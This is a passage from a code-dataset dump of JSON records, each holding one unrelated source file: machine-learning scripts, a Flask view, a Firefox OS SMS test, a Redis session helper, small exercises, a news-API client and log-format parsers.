:-1]\n y_test = df_test.iloc[:, -1]\n\n return X_train, X_valid, X_test, y_train, y_valid, y_test\n\n\ndef decimate_nonzero_train_data(df_train, df_test):\n df_test_zero = df_test[df_test['adf flag'] == 0]\n df_test_one = df_test[df_test['adf flag'] == 1]\n df_test_two = df_test[df_test['adf flag'] == 2]\n test_frac_one_by_zero = df_test_one.shape[0] / df_test_zero.shape[0]\n test_frac_two_by_zero = df_test_two.shape[0] / df_test_zero.shape[0]\n\n df_train_zero = df_train[df_train['adf flag'] == 0]\n df_train_one = df_train[df_train['adf flag'] == 1]\n df_train_two = df_train[df_train['adf flag'] == 2]\n train_frac_one_by_zero = df_train_one.shape[0] / df_train_zero.shape[0]\n train_frac_two_by_zero = df_train_two.shape[0] / df_train_zero.shape[0]\n\n if train_frac_one_by_zero > test_frac_one_by_zero:\n print('======== decimate one')\n print('test: {}'.format(test_frac_one_by_zero))\n print('train: {}'.format(train_frac_one_by_zero))\n frac = test_frac_one_by_zero / train_frac_one_by_zero\n df_train_one = df_train_one.sample(frac=frac, random_state=42)\n\n if train_frac_two_by_zero > test_frac_two_by_zero:\n print('======== decimate two')\n print('test: {}'.format(test_frac_two_by_zero))\n print('train: {}'.format(train_frac_two_by_zero))\n frac = test_frac_two_by_zero / train_frac_two_by_zero\n df_train_two = df_train_two.sample(frac=frac, random_state=42)\n\n return pd.concat([df_train_zero, df_train_one, df_train_two])\n\n\ndef decimate_past_train_data(args, df_train):\n print('======== decimate past_data')\n df_train.sort_index(ascending=True, inplace=True)\n rows = df_train.shape[0]\n divs = 20\n div_number = [i//(rows//divs) for i in range(rows)]\n df_train['div_number'] =div_number\n dfs = []\n for i in range(divs):\n df = df_train[df_train['div_number'] == i]\n if i < int(divs*0.8):\n df = df.sample(frac=(i+1)/divs, random_state=42)\n dfs.append(df)\n df_train_mini = pd.concat(dfs)\n df_train_mini.drop(['div_number'], axis=1, inplace=True)\n return df_train_mini\n","sub_path":"src/prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"325990723","text":"import argparse\nimport os\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image_dataset_from_directory\n\n\n# Training\n# Padding Convet\ndef import_images(path, IMG_SIZE=(160, 160), visualize=0):\n train_dir = os.path.join(path, \"images\\\\train\")\n validation_dir = os.path.join(path, \"images\\\\validation\")\n\n BATCH_SIZE = 32\n IMG_SIZE = (160, 160)\n\n with tf.device(\"/gpu:0\"):\n train_dataset = image_dataset_from_directory(\n train_dir, shuffle=True, batch_size=BATCH_SIZE, image_size=IMG_SIZE\n )\n\n validation_dataset = image_dataset_from_directory(\n validation_dir, shuffle=True, batch_size=BATCH_SIZE, image_size=IMG_SIZE\n )\n\n val_batches = tf.data.experimental.cardinality(validation_dataset)\n test_dataset = validation_dataset.take(val_batches // 5)\n validation_dataset = validation_dataset.skip(val_batches // 5)\n\n class_names = train_dataset.class_names\n\n if visualize == 1:\n\n plt.figure(figsize=(17, 10))\n for images, labels in train_dataset.take(1):\n for i in range(BATCH_SIZE):\n _ = plt.subplot(4, 8, i + 1)\n plt.imshow(images[i].numpy().astype(\"uint8\"))\n plt.title(class_names[labels[i]])\n plt.axis(\"off\")\n\n print(\"Number of validation batches: %d\" % tf.data.experimental.cardinality(validation_dataset))\n print(\"Number of test batches: %d\" % tf.data.experimental.cardinality(test_dataset))\n\n return train_dataset, validation_dataset, val_batches, test_dataset, IMG_SIZE\n\n\nclass Model:\n def __init__(self, train_dataset, validation_dataset, IMG_SIZE):\n self.train_dataset = train_dataset\n self.validation_dataset = validation_dataset\n\n self.data_augmentation = tf.keras.Sequential(\n [\n tf.keras.layers.experimental.preprocessing.RandomFlip(\"horizontal\"),\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2),\n tf.keras.layers.experimental.preprocessing.RandomZoom(height_factor=(-0.3, 0)),\n ]\n )\n self.preprocess_input = tf.keras.applications.mobilenet_v2.preprocess_input\n self.rescale = tf.keras.layers.experimental.preprocessing.Rescaling(1.0 / 127.5, offset=-1)\n self.IMG_SHAPE = IMG_SIZE + (3,)\n\n def train(\n self,\n base_learning_rate=0.0001,\n initial_epochs=10,\n fine_tune_epochs=20,\n fine_tune_at=50,\n folder_name=\"trained_model\",\n ):\n base_model = tf.keras.applications.MobileNetV2(\n input_shape=self.IMG_SHAPE, include_top=False, weights=\"imagenet\"\n )\n base_model.trainable = False\n\n image_batch, label_batch = next(iter(self.train_dataset))\n # feature_batch = base_model(image_batch)\n\n global_average_layer = tf.keras.layers.GlobalAveragePooling2D()\n # feature_batch_average = global_average_layer(feature_batch)\n\n prediction_layer = tf.keras.layers.Dense(5, activation=\"softmax\")\n # prediction_batch = prediction_layer(feature_batch_average)\n\n with tf.device(\"/gpu:0\"):\n inputs = tf.keras.Input(shape=(160, 160, 3))\n x = self.data_augmentation(inputs)\n x = self.preprocess_input(x)\n x = base_model(x, training=False)\n x = global_average_layer(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = prediction_layer(x)\n model = tf.keras.Model(inputs, outputs)\n\n model.compile(\n optimizer=tf.keras.optimizers.Adam(learning_rate=base_learning_rate),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n metrics=[\"accuracy\"],\n )\n # breakpoint()\n self.history = model.fit(self.train_dataset, epochs=initial_epochs, validation_data=self.validation_dataset)\n\n base_model.trainable = True\n\n # Fine-tune from this layer onwards\n # fine_tune_at = 50\n\n # Freeze all the layers before the `fine_tune_at` layer\n for layer in base_model.layers[:fine_tune_at]:\n layer.trainable = False\n\n model.compile(\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n optimizer=tf.keras.optimizers.RMSprop(lr=base_learning_rate / 10),\n metrics=[\"accuracy\"],\n )\n\n total_epochs = initial_epochs + fine_tune_epochs\n\n self.history_finetune = model.fit(\n self.train_dataset,\n epochs=total_epochs,\n initial_epoch=self.history.epoch[-1],\n validation_data=self.validation_dataset,\n )\n\n model.save(folder_name)\n\n return model\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Please enter folder name for a saved model.\")\n parser.add_argument(\"--folder_name\", type=str, help=\"Folder name for a trained model\", default=\"trained_model_2\")\n args = parser.parse_args()\n train_dataset, validation_dataset, val_batches, test_dataset, IMG_SIZE = import_images(\"\")\n model = Model(train_dataset, validation_dataset, IMG_SIZE)\n model.train(initial_epochs=1, fine_tune_epochs=1, folder_name=args.folder_name)\n","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"475408489","text":"# -*- coding: utf-8 -*-\n\n\nclass TimeMap:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.dic = {}\n\n def set(self, key: 'str', value: 'str', timestamp: 'int') -> 'None':\n if key in self.dic:\n self.dic[key].append({'v': value, 't': timestamp})\n else:\n self.dic[key] = [{'v': value, 't': timestamp}]\n\n def get(self, key: 'str', timestamp: 'int') -> 'str':\n if key in self.dic:\n for kv in reversed(self.dic[key]):\n if timestamp >= kv['t']:\n return kv['v']\n return \"\"\n else:\n return \"\"\n\n# Your TimeMap object will be instantiated and called as such:\n# obj = TimeMap()\n# obj.set(key,value,timestamp)\n# param_2 = obj.get(key,timestamp)\n","sub_path":"algorithms/python-solution/solution/time_based_key_value_store.py","file_name":"time_based_key_value_store.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"229939702","text":"\n\"\"\" Module summary:\nFunctions:\n farmsShowAll - Show all farms.\n farmsManage - Show all farms belonging to the current user.\n farmNew - Create a new farm and add it to the database.\n farmDelete - Delete an existing farm. \n\"\"\"\n\nfrom flask import Blueprint, render_template, request, redirect, url_for\nfrom flask import flash\nfrom flask import session as login_session\n\nfrom sqlalchemy import asc\n\n# from secondresponse.database.dbsetup import Farm\nfrom secondresponse.database.dbconnect import db_session\n# from secondresponse.views.util import imageDeleteProfile\n\nfrom util import login_required\n\n############################################################################\n\nfarm = Blueprint(\"create\", __name__)\n\n# @farm.route(\"/create\")\n# def create():\n # farms = db_session.query(Farm).order_by(asc(Farm.name))\n\n # user_id = login_session.get(\"user_id\")\n # username = login_session.get(\"username\")\n\n # return render_template(\"farms.html\",\n # farms=farms,\n # username=username)\n\n\n# @farm.route(\"/farms/manage\", methods=[\"GET\",\"POST\"])\n# @login_required\n# def farmsManage():\n # \"\"\"Show all farms belonging to the current user.\"\"\"\n # user_id = login_session.get(\"user_id\")\n # username = login_session.get(\"username\")\n \n # # If someone is logged in, show them their farms:\n # user_farms = db_session.query(Farm).filter_by(\n # user_id=user_id).order_by(asc(Farm.name))\n # user_farms = [farm for farm in user_farms]\n # return render_template(\"farmsManage.html\",\n # user_farms=user_farms,\n # username=username)\n \n\n@farm.route(\"/create\", methods=[\"GET\",\"POST\"])\n@login_required\ndef needNew():\n \"\"\"Create a new farm and add it to the database.\"\"\"\n # user_id = login_session.get(\"user_id\")\n # username = login_session.get(\"username\")\n \n # Check that the user_id argument matches the login_session user_id.\n if request.method == \"POST\":\n if not request.form[\"name\"]:\n return render_template(\"farmNew.html\",\n name_error=True,\n username=username)\n\n newFarm = Farm(name = request.form[\"name\"],\n location = request.form[\"location\"],\n description = request.form[\"description\"],\n picture = None,\n user_id=login_session[\"user_id\"])\n db_session.add(newFarm)\n db_session.commit()\n\n picture = request.files[\"picture\"]\n if picture:\n db_session.refresh(newFarm)\n picture_name = imageUploadProfile(farm_id=newFarm.id, file=picture)\n newFarm.picture = picture_name\n db_session.add(newFarm)\n db_session.commit()\n\n flash(\"New Farm %s Successfully Created\" % newFarm.name)\n return redirect(url_for(\"farm.farmsManage\"))\n\n else:\n return render_template(\"farmNew.html\",\n username=username)\n\n return render_template(\"farmNew.html\",\n error=request.files[\"picture\"])\n\n\n@farm.route(\"/farms//delete\", methods=[\"GET\",\"POST\"])\n@login_required\ndef farmDelete(farm_id):\n \"\"\"Delete an existing farm.\"\"\"\n farm = db_session.query(Farm).filter_by(id = farm_id).one()\n\n user_id = login_session.get(\"user_id\")\n username = login_session.get(\"username\")\n\n # Check that the login_session user_id matches the farm user_id:\n if user_id == farm.user_id:\n if request.method == \"POST\":\n if farm.picture:\n imageDeleteProfile(filename=farm.picture)\n\n db_session.delete(farm)\n db_session.commit()\n flash(\"Farm Successfully Deleted: %s\" % (farm.name))\n return redirect(url_for(\"farm.farmsManage\"))\n\n else:\n return render_template(\"farmDelete.html\",\n farm=farm,\n username=username)\n\n else:\n return redirect(url_for(\"catalog.catalogShow\",farm_id=farm_id))\n","sub_path":"secondresponse/views/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"342960415","text":"#\n# Imports which are standard for all test cases.\n#\nimport sys\nsys.path.insert(1, \"./\")\nfrom gaiatest import GaiaTestCase\nfrom OWDTestToolkit import *\n\n#\n# Imports particular to this test case.\n#\nfrom tests._mock_data.contacts import MockContacts\n\nclass test_main(GaiaTestCase):\n \n _TestMsg = \"Test message.\"\n \n def setUp(self):\n #\n # Set up child objects...\n #\n GaiaTestCase.setUp(self)\n self.UTILS = UTILS(self)\n self.messages = Messages(self)\n self.contacts = Contacts(self)\n \n self.num1 = self.UTILS.get_os_variable(\"GLOBAL_TARGET_SMS_NUM\")\n self.emailAddy = self.UTILS.get_os_variable(\"GMAIL_1_EMAIL\")\n \n self.UTILS.addFileToDevice('./tests/_resources/contact_face.jpg', destination='DCIM/100MZLLA')\n \n self.cont = MockContacts().Contact_multipleEmails\n self.data_layer.insert_contact(self.cont)\n \n def tearDown(self):\n self.UTILS.reportResults()\n \n def test_run(self):\n #\n # Launch messages app.\n #\n self.messages.launch()\n \n #\n # Make sure we have no threads (currently blocked - use _RESTART_DEVICE instead).\n #\n# self.messages.deleteAllThreads()\n \n #\n # Create and send a new test message.\n #\n self.messages.createAndSendSMS([self.num1], \"Hello \" + self.emailAddy + \" old bean.\")\n x = self.messages.waitForReceivedMsgInThisThread()\n \n #\n # Long press the email link.\n #\n _link = x.find_element(\"tag name\", \"a\")\n self.actions = Actions(self.marionette)\n self.actions.long_press(_link,2).perform()\n \n #\n # Click 'Add to an existing contact'.\n #\n x = self.UTILS.getElement( (\"xpath\", \"//button[text()='Add to an existing contact']\"),\n \"Create new contact button\")\n x.tap()\n \n #\n # Verify that the email is in the email field.\n #\n self.UTILS.switchToFrame(*DOM.Contacts.frame_locator)\n x = self.UTILS.getElement( (\"xpath\", \"//p[@data-order='%s']\" % self.cont[\"name\"].replace(\" \", \"\")),\n \"Search item\")\n x.tap()\n \n self.UTILS.waitForElements((\"xpath\",\"//input[@type='email' and @value='%s']\" % self.emailAddy), \"New email address\")\n \n #\n # Add gallery image.\n #\n self.contacts.addGalleryImageToContact(0)\n\n \n #\n # Press the Update button.\n #\n done_button = self.UTILS.getElement(DOM.Contacts.edit_update_button, \"'Update' button\")\n done_button.tap()\n\n #\n # Check that the contacts iframe is now gone.\n #\n self.marionette.switch_to_frame()\n self.UTILS.waitForNotElements( (\"xpath\", \"//iframe[contains(@src,'contacts')]\"),\n \"Contact app iframe\")\n \n #\n # Now return to the SMS app.\n #\n self.UTILS.switchToFrame(*DOM.Messages.frame_locator)","sub_path":"tests/SMS/test_26973.py","file_name":"test_26973.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"575695154","text":"import redis\nimport settings\n\n\n\n\n\nredis_client = redis.Redis(db=1)\n\n\nclass Session(object):\n\n @classmethod\n def new(cls, account, expire=60*60):\n if account:\n key = settings.SESSION_NAME.format(account)\n redis_client.setex(key, account, expire)\n return str(account)\n\n @classmethod\n def rm(cls, account):\n key = settings.SESSION_NAME.format(account)\n if key:\n redis_client.delete(key)\n\n @classmethod\n def account_by_cookie(cls, cookie):\n if cookie:\n key = settings.SESSION_NAME.format(cookie)\n if redis_client.get(key):\n return str(cookie)\n else:\n return False\n else:\n return False\n","sub_path":"session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"195268528","text":"\"\"\"3.\tWrite a program to accept 2 different numbers from the user and print all the prime numbers from the user and print all the prime numbers.\"\"\"\r\n\r\ndef is_prime(num):\r\n if num<2:\r\n return False\r\n for i in range(2,num//2+1):\r\n if num%i==0:\r\n return False\r\n return True\r\nLB=int(input(\"enter lower bound\"))\r\nUB=int(input(\"enter upper bound\"))\r\nfor i in range(LB,UB+1):\r\n if is_prime(i):\r\n print(i)\r\n\r\n","sub_path":"ASSIGNMENT_PYTHON/M1/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"91018225","text":"#!/usr/bin/python\r\nfile = open(\"Divisor_exercise.txt\")\r\ntext = file.read()\r\nsplittext = text.split(\"\\n\")\r\nfout=open('Divisors', 'wt')\r\nfor item in splittext[1:-1]:\r\n divisors = []\r\n for i in range(2, (int(item)-1), 1):\r\n if int(item) % i == 0:\r\n i=str(i)\r\n divisors.append(i)\r\n if len(divisors)==0:\r\n fout.write(item + \" is a prime.\\n\")\r\n else:\r\n divisors_strings=\",\".join(divisors)\r\n fout.write(\"Divisors of \" + item + \": \" + divisors_strings + \"\\n\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Assignments/Assignment4.py","file_name":"Assignment4.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160279890","text":"#!/usr/bin/env python\nimport rospy\nimport robot_eup\nfrom robot_eup.msg import RobotType\n\n#############################################\n\ndef main_loop(robot):\n\n robot.display_message(\n message='Hello, my name is Chester. Please put A, B, and C.',\n duration=3)\n choice = robot.ask_choice(\n message='Where should I deliver?',\n choices=['A', 'B', 'C',])\n robot.say(text='Now, I will deliver to you.')\n if choice == 'A':\n robot.move(x=0.5, y=0.0, theta=0.75, duration=4)\n robot.say(text='Take delivery.')\n robot.move(x=0.0, y=0.0, theta=0.0, duration=4)\n elif choice == 'B':\n robot.move(x=1.0, y=2.0, theta=-0.75, duration=4)\n robot.say(text='Take delivery.')\n robot.move(x=0.0, y=0.0, theta=0.0, duration=4)\n elif choice == 'C':\n robot.move(x=0.0, y=-2.0, theta=2.0, duration=4)\n robot.say(text='Take delivery.')\n robot.move(x=0.0, y=0.0, theta=0.0, duration=4)\n else:\n robot.say('I could not hear you.')\n\n\n#############################################\n\nif __name__ == '__main__':\n rospy.init_node('robot_eup_delivery')\n robot = robot_eup.RobotFactory().build(RobotType.TURTLEBOT)\n robot.start_robot()\n while not rospy.is_shutdown():\n main_loop(robot)\n","sub_path":"robot_eup_samples/scripts/workshop/delivery_sangha.py","file_name":"delivery_sangha.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"171675937","text":"import shutil\nimport tempfile\nimport numpy as np\nimport scipy.sparse as sp\n\nfrom numpy.testing import assert_array_almost_equal\n\nfrom sklearn.datasets import make_classification\nfrom sklearn.svm import LinearSVC\n\nfrom common import SplearnTestCase\nfrom splearn.rdd import ArrayRDD, TupleRDD\nfrom splearn.svm import SparkLinearSVC\n\n\nclass SVMClassesTestCase(SplearnTestCase):\n\n def setUp(self):\n super(SVMClassesTestCase, self).setUp()\n self.outputdir = tempfile.mkdtemp()\n\n def tearDown(self):\n super(SVMClassesTestCase, self).tearDown()\n shutil.rmtree(self.outputdir)\n\n def generate_dataset(self, classes, samples, blocks=None):\n X, y = make_classification(n_classes=classes,\n n_samples=samples, n_features=5,\n n_informative=4, n_redundant=0,\n n_clusters_per_class=1,\n random_state=42)\n\n X_rdd = self.sc.parallelize(X)\n y_rdd = self.sc.parallelize(y)\n\n Z = TupleRDD(X_rdd.zip(y_rdd), blocks)\n\n return X, y, Z\n\n\nclass TestLinearSVC(SVMClassesTestCase):\n\n def test_same_coefs(self):\n X, y, Z = self.generate_dataset(2, 100000)\n\n local = LinearSVC()\n dist = SparkLinearSVC()\n\n local.fit(X, y)\n dist.fit(Z, classes=np.unique(y))\n\n assert_array_almost_equal(local.coef_, dist.coef_, decimal=4)\n","sub_path":"python/test/test_svm_classes.py","file_name":"test_svm_classes.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"118289046","text":"\nimport urllib.request,json\nfrom .models import Source, Article\n\n\n# Getting the API key, base url and article base url\napi_key = None\nbase_url = None\narticle_base_url = None\n\ndef configure_request(app):\n global api_key,base_url, article_base_url\n api_key = app.config['NEWS_API_KEY']\n base_url = app.config['NEWS_API_BASE_URL']\n article_base_url = app.config['ARTICLES_API_BASE_URL']\n\ndef get_sources():\n '''\n Function that gets the json response to our url request\n '''\n get_sources_url = base_url.format(api_key)\n # print(get_sources_url)\n with urllib.request.urlopen(get_sources_url) as url:\n get_sources_data = url.read()\n get_sources_response = json.loads(get_sources_data)\n\n sources_results = None\n\n if get_sources_response['sources']:\n sources_results_list = get_sources_response['sources']\n sources_results = process_results(sources_results_list)\n\n\n return sources_results\n\n\ndef get_source(id):\n get_source_details_url = base_url.format(id,api_key)\n\n with urllib.request.urlopen(get_source_details_url) as url:\n source_details_data = url.read()\n source_details_response = json.loads(source_details_data)\n\n source_object = None\n if source_details_response:\n id = source_details_response.get('id')\n name = source_details_response.get('name')\n description = source_details_response.get('description')\n url = source_details_response.get('url')\n language = source_details_response.get('language')\n country = source_details_response.get('country')\n\n source_object = Source(name, description, url, language, country)\n\n\n return movie_object\n\ndef process_results(sources_list):\n '''\n Transforms the source results into a list of objects\n\n Args:\n sources_list = a list of dictionaries that contain article details\n\n Returns:\n sources_results\n '''\n\n sources_results = []\n for source in sources_list:\n name = source.get('name')\n description = source.get('description')\n url = source.get('url')\n language = source.get('language')\n country = source.get('country')\n\n if url:\n source_object = Source(name, description, url, language, country)\n sources_results.append(source_object)\n\n return sources_results\n\ndef get_articles(query):\n '''\n Function that gets the json response to our url request\n '''\n get_articles_url = article_base_url.format(query,api_key)\n # print(get_sources_url)\n with urllib.request.urlopen(get_articles_url) as url:\n get_articles_data = url.read()\n get_articles_response = json.loads(get_articles_data)\n\n articles_results = None\n\n if get_articles_response['articles']:\n articles_results_list = get_articles_response['articles']\n articles_results = process_article_results(articles_results_list)\n\n\n return articles_results\n\n\n\n\ndef process_article_results(article_list):\n '''\n Function that processes the articles result and transform them to a list of Objects\n\n Args:\n article_list: A list of dictionaries that contain articles' details\n\n Returns :\n articles_results: A list of movie objects\n '''\n articles_results = []\n for article_item in article_list:\n author = article_item.get('author')\n title = article_item.get('title')\n description = article_item.get('description')\n url = article_item.get('url')\n urlToImage = article_item.get('urlToImage')\n publishedAt = article_item.get('publishedAt')\n\n if urlToImage:\n article_object = Article(author, title, description, url, urlToImage,publishedAt)\n articles_results.append(article_object)\n\n return articles_results\n","sub_path":"app/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"39204144","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 10 11:23:49 2018\n\ngravityLine\n\n@author: xzhang\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport func as F\n\n#==============================================================================#\ndata = np.loadtxt('cavity01.csv',dtype='float',delimiter=', ')\nvinlet=15.0\nxMax = 1.6\nfigName = 'gravityLine01.PNG'\nxxStep = 0.035\n#==============================================================================#\ndata = data.transpose()\ndata = np.delete(data,1,0)\ndata = data.T[np.lexsort(data[::-1,:])].T #sort in terms of the x\nx = -data[0][::-1] #set x to positive\nz = data[1][::-1]\ndataDict = dict(zip(x,z)) #x:z dictionary\nzLowerDict = {} #dictionary{xx:zLower}\nzUpperDict = {} #dictionary{xx:zUpper}\n\n\n#------|------|-------|------|------|------|-------|------|------|------|------#\nxx = np.arange(0.0,xMax,xxStep)\n#group z into upper and lower dictionary\nfor xxIter in xx:\n zUL = np.array([])\n for xIter in x:\n if ((xIter>=xxIter) and (xIter<=xxIter+xxStep)):\n zUL = np.append(zUL,dataDict[xIter])\n zLowerDict[xxIter] = min(zUL)\n zUpperDict[xxIter] = max(zUL)\n#------|------|-------|------|------|------|-------|------|------|------|------#\n\n\n#gamma(x): (g/(pi*v**2))*integrate(vol/r,0,x)\ndef gamma(x):\n gamma0=0.0\n for xIndex in np.arange(0,len(xx)-1,1):\n if xx[xIndex] >= x:\n break\n else: #central difference\n vol1=F.volx(xx[xIndex],xx,zLowerDict,zUpperDict,xxStep)\n vol2=F.volx(xx[xIndex+1],xx,zLowerDict,zUpperDict,xxStep)\n vol = 0.5*vol1+0.5*vol2\n r1=F.rx(xx[xIndex],zLowerDict,zUpperDict,xxStep)\n r2=F.rx(xx[xIndex+1],zLowerDict,zUpperDict,xxStep)\n r = 0.5*r1+0.5*r2\n gamma0 += (9.81/(np.pi*vinlet*vinlet))*(vol/(r*r))*xxStep\n return gamma0\n\n#xx to gamma(xx)\ndef x2gamma(xx):\n g = np.array([])\n for x0 in xx:\n g = np.append(g,gamma(x0))\n return g\n\n#xx to r(xx)\ndef x2r(xx): #calculate radius\n r = np.array([])\n for x0 in xx:\n r = np.append(r,F.rx(x0,zLowerDict,zUpperDict,xxStep))\n return r\n\n\n#middle line\nzMid = np.array([])\nfor xIndex in np.arange(0,len(xx),1):\n z = 0.5*zUpperDict[xx[xIndex]]+0.5*zLowerDict[xx[xIndex]]\n zMid = np.append(zMid,z)\n\n#-------------------------------------------------------------------------------\nplt.figure(figsize=(14,6))\n#plt.scatter(xx,x2r(xx)) #plot radius\n#plt.scatter(x,z)\nplt.scatter(xx,F.x2z(xx,zLowerDict),c='k')\nplt.scatter(xx,F.x2z(xx,zUpperDict),c='k')\nplt.scatter(xx,zMid,c='b')\nplt.plot(xx,x2gamma(xx),c='r')\nplt.savefig(figName, dpi=500) \nplt.show()\n#-------------------------------------------------------------------------------\n","sub_path":"GravityLine/gravityLine.py","file_name":"gravityLine.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"136447532","text":"import calendar\nfrom datetime import datetime\nimport fnmatch\nimport json\nimport logging\nimport os\nimport re\n\nimport slurp\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass AccessParser(slurp.EventParser):\n\n IP = r'(?P\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}) -'\n USER = r'(?P.+)'\n DATE = r'(?P\\d{2})\\/(?P\\w{3})\\/(?P\\d{4})'\n TIME = r'(?P\\d{2}):(?P\\d{2}):(?P\\d{2})'\n TIMESTAMP = r'\\[' + DATE + ':' + TIME + r'\\]'\n RESOURCE = r'\\\"((?P\\w+) (?P.+) HTTP\\/(?P\\d\\.\\d)|-)\\\"'\n STATUS = r'(?P\\w+)'\n BYTES = r'(?P\\d+)'\n REFERRER = r'\\\"(?P.*?)\\\"'\n USER_AGENT = r'\\\"(?P.+?)\\\"'\n\n PATTERN = ' '.join([\n IP, USER, TIMESTAMP, RESOURCE, STATUS, BYTES, REFERRER, USER_AGENT])\n RE = re.compile(PATTERN)\n\n BLOCK_TERMINAL = '\\n'\n\n MONTHS = dict((calendar.month_abbr[i], i) for i in range(1, 12))\n\n def __call__(self, src_file, offset_b, offset_e, raw):\n tag = os.path.splitext(os.path.basename(src_file))[0]\n match = self.RE.match(raw)\n if not match:\n raise ValueError('Unable to parse event from %s[%s:%s]' %\n (src_file, offset_b, offset_e))\n ip = match.group('ip')\n timestamp = datetime(\n year=int(match.group('year')),\n month=self.MONTHS[match.group('month')],\n day=int(match.group('day')),\n hour=int(match.group('hour')),\n minute=int(match.group('min')),\n second=int(match.group('sec')))\n user = match.group('user')\n if user == '-':\n user = None\n method = match.group('method')\n uri = match.group('uri')\n version = match.group('version')\n status = int(match.group('status'))\n severity = 'error' if status >= 500 else 'info'\n bytes = int(match.group('bytes'))\n referrer = match.group('referrer')\n if referrer == '-':\n referrer = None\n user_agent = match.group('user_agent')\n event = {\n 'src_file': src_file,\n 'offset_b': offset_b,\n 'offset_e': offset_e,\n 'tag': tag,\n 'severity': severity,\n 'timestamp': timestamp,\n 'payload': {\n 'ip': ip,\n 'user': user,\n 'method': method,\n 'uri': uri,\n 'version': version,\n 'status': status,\n 'bytes': bytes,\n 'referrer': referrer,\n 'user_agent': user_agent,\n },\n }\n return event\n\n\nclass ErrorParser(slurp.EventParser):\n\n DATE = r'(?P\\d{4})-(?P\\d{2})-(?P\\d{2})'\n TIME = r'(?P\\d{2}):(?P\\d{2}):(?P\\d{2})\\,(?P\\d{3})'\n TIMESTAMP = DATE + ' ' + TIME\n SEVERITY = r'(?P\\w+)'\n CHANNEL = r'(?P.+?)'\n PROCESS = r'.+?'\n THREAD = r'.+?'\n MESSAGE = r'(?P.*)'\n\n PATTERN = ' : '.join([\n TIMESTAMP, SEVERITY, CHANNEL, PROCESS, THREAD, MESSAGE])\n RE = re.compile(PATTERN, flags=re.DOTALL)\n\n BLOCK_TERMINAL = '\\n'\n BLOCK_PREAMBLE_PATTERN = ' : '.join([TIMESTAMP, SEVERITY, CHANNEL])\n BLOCK_PREAMBLE_RE = re.compile(BLOCK_PREAMBLE_PATTERN)\n\n def __call__(self, src_file, offset_b, offset_e, raw):\n tag = os.path.splitext(os.path.basename(src_file))[0]\n match = self.RE.match(raw)\n if not match:\n raise ValueError('Unable to parse event from %s[%s:%s]' %\n (src_file, offset_b, offset_e))\n timestamp = datetime(\n year=int(match.group('year')),\n month=int(match.group('month')),\n day=int(match.group('day')),\n hour=int(match.group('hour')),\n minute=int(match.group('min')),\n second=int(match.group('sec')),\n microsecond=int(match.group('usec')))\n event = {\n 'src_file': src_file,\n 'offset_b': offset_b,\n 'offset_e': offset_e,\n 'tag': tag,\n 'severity': match.group('severity').lower(),\n 'timestamp': timestamp,\n 'payload': {\n 'channel': match.group('channel'),\n 'message': match.group('message'),\n },\n }\n return event\n\n\nclass SyslogParser(slurp.EventParser):\n\n FACILITY = r'(?P\\d+)'\n SEVERITY = r'(?P\\w+)'\n PREFIX = r'<' + FACILITY + r'\\.' + SEVERITY + r'>'\n DATE = r'(?P\\d{4})-(?P\\d{2})-(?P\\d{2})'\n TIME = r'(?P\\d{2}):(?P\\d{2}):(?P\\d{2})(\\.(?P\\d{6})){0,1}'\n TZONE = r'(?P\\d{2}):(?P\\d{2})'\n TIMESTAMP = DATE + r'T' + TIME + r'\\+' + TZONE\n HOST = '(?P.+?)'\n TAG = '(?P.+?)(\\[(?P\\d+)\\]){0,1}:'\n MESSAGE = r'(?P.*)'\n\n PATTERN = ' '.join([PREFIX, TIMESTAMP, HOST, TAG, MESSAGE])\n RE = re.compile(PATTERN)\n\n BLOCK_TERMINAL = '\\n'\n BLOCK_PREAMBLE_PATTERN = ' '.join([PREFIX, TIMESTAMP])\n BLOCK_PREAMBLE_RE = re.compile(BLOCK_PREAMBLE_PATTERN)\n\n def __call__(self, src_file, offset_b, offset_e, raw):\n tag = os.path.splitext(os.path.basename(src_file))[0]\n match = self.RE.match(raw)\n if not match:\n raise 